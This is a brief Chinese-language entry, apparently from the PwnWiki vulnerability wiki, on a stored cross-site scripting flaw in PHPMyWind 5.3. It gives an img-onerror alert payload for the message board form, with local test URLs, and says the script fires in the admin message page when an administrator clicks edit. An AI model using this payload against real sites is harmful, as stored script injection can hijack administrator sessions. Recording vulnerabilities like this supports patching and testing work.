Loading
0

PHPmywind 5.3 储存型xss漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

Payload

留言板

http://127.0.0.1/PHPMyWind_5.3/shoppingcart.php

“><img/src=x onerror=alert(2001)><“‘

后台

127.0.0.1/PHPMyWind_5.3/admin/message.php

需要点击修改才可以弹XSS
如果管理员留言需要前台显示(或者回复)就必须点击修改。

pwnwiki.com